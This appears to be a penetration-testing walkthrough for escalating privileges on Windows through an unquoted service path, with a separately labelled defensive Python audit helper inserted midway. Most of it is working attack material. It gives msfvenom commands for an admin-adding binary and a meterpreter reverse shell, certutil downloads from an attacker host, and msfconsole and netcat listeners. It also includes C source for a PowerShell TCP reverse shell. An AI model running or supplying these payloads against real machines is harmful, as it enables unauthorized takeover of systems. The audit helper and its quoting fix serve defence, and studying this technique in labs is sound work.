EXPLOITING INSECURE SERVICE WITH METASPLOIT

  1. Let's create a binary that adds a user to the Administrators group with msfvenom.
    msfvenom -p windows/x64/exec CMD='net localgroup Administrators [USERNAME] /add' -f exe > common.exe

  2. Host the binary with Python's HTTP server and transfer it to the target machine with certutil.
    certutil -urlcache -f http://[IP-ADDRESS]:8000/common.exe common.exe

  3. Move the binary to the path C:\Program Files\Unquoted Path Service
    move common.exe "C:\Program Files\Unquoted Path Service\"

  4. Now run net start unquotedsvc on the target to execute the exploit.

    NOTE: If SeShutdownPrivilege is enabled you can reboot to have the service restart automatically.
    shutdown /r /t 0

GENERATING REVERSE SHELL WITH MSFVENOM

  1. Let's create a reverse shell binary with msfvenom.
    msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=[ATTACKER-IP] LPORT=[PORT] -o unquotedpathservice.exe

  2. Host the binary with Python's HTTP server and transfer it to the target machine with certutil.
    certutil -urlcache -f http://[IP-ADDRESS]:8000/unquotedpathservice.exe unquotedpathservice.exe

  3. Copy your reverse shell executable into the service's path and rename it to match the first valid segment of the unquoted service path:
    copy C:\Temp\unquotedpathservice.exe "C:\Program Files\Unquoted Path Service\Common.exe"

  4. Start your listener on the attacking machine
    msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"

    NOTE: Alternatively, we can start a listener using nc:
    sudo rlwrap -cAr nc -lvnp 1338

  5. Now run net start unquotedsvc on the target machine to execute the exploit.

    NOTE: If SeShutdownPrivilege is enabled you can reboot to have the service restart automatically.
    shutdown /r /t 0
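
The naming rule in step 3 (why the planted file is called Common.exe) comes from how Windows resolves an unquoted path with spaces. The following defender-side audit helper is an added example, not part of the original page: it computes, for each service, the paths Windows would try before the intended binary and flags the services whose ImagePath needs quoting. The wmic-style CSV input, host name and service entries are constructed for this example.

```python
"""Audit helper: flag Windows services whose unquoted ImagePath contains spaces
and list the paths the Service Control Manager would try before the intended
binary. Added example, not part of the original page."""
import re

# Constructed sample in the shape of `wmic service get Name,PathName /format:csv`
# output; the host name and the three service entries are made up.
SAMPLE_WMIC_CSV = r"""Node,Name,PathName
WORKSTATION01,unquotedsvc,C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
WORKSTATION01,Spooler,C:\Windows\System32\spoolsv.exe
WORKSTATION01,QuotedSvc,"C:\Program Files\Quoted Service\service.exe" -k run
"""

def executable_part(image_path: str) -> str:
    """Executable portion of an ImagePath without its arguments: a quoted path
    ends at the closing quote; an unquoted one is cut after the first '.exe'."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        return image_path[1:end] if end != -1 else image_path[1:]
    match = re.search(r"\.exe\b", image_path, re.IGNORECASE)
    return image_path[: match.end()] if match else image_path

def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the path is not quoted and its executable path has a space."""
    return not image_path.strip().startswith('"') and " " in executable_part(image_path)

def candidate_paths(image_path: str) -> list:
    """Paths Windows tries, in order, before the intended binary: every space in
    the unquoted executable path may end the file name, and '.exe' is appended
    (CreateProcess rule). Returns [] for quoted or space-free paths."""
    if not is_unquoted_with_spaces(image_path):
        return []
    tokens = executable_part(image_path).split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]

def audit(wmic_csv: str) -> dict:
    """Map each flagged service name to the paths a planted binary could occupy."""
    findings = {}
    for line in wmic_csv.splitlines():
        if not line.strip() or line.startswith("Node,"):  # skip blank and header lines
            continue
        _node, name, path = line.split(",", 2)  # PathName is last and may contain commas
        candidates = candidate_paths(path)
        if candidates:
            findings[name] = candidates
    return findings

if __name__ == "__main__":
    for svc, paths in audit(SAMPLE_WMIC_CSV).items():
        print(f"{svc}: unquoted path with spaces; resolves first to {paths[0]}")
```

The fix for a flagged service is to quote its ImagePath (sc config <name> binPath= with the path wrapped in escaped quotes) and to confirm with icacls that none of the listed intermediate directories are writable by non-administrators.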

CREATING A CUSTOMIZED EXPLOIT

  1. Create the source for the following custom executable on your attacker machine by copying the code into a text editor and saving it as exploit.c.

    #include <windows.h>
    #include <stdlib.h>   /* system() */
    #include <stdio.h>

    /* When the service starts this binary, it launches a PowerShell TCP reverse shell
       that connects back to the listener on [IP-ADDRESS]:1337 (see step 5). */
    int main(){
        system("powershell.exe -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('[IP-ADDRESS]',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");
        return 0;
    }
    

  2. Our exploit.c file is now ready to compile. We can compile it directly on our attacker machine using mingw-w64 with the following command:
    x86_64-w64-mingw32-gcc exploit.c -o common.exe

    NOTE: If you don't have mingw-w64 installed, you can install it with:
    apt install mingw-w64

  3. Host the binary with Python's HTTP server and transfer it to the target machine with certutil.
    certutil -urlcache -f http://[IP-ADDRESS]:8000/common.exe common.exe

  4. Move the binary to the path C:\Program Files\Unquoted Path Service
    move common.exe "C:\Program Files\Unquoted Path Service\"

  5. Start your listener on the attacking machine and run net start unquotedsvc on the target machine to execute the exploit.
    sudo rlwrap -cAr nc -lvnp 1337

    NOTE: If SeShutdownPrivilege is enabled you can reboot to have the service restart automatically.
    shutdown /r /t 0 /f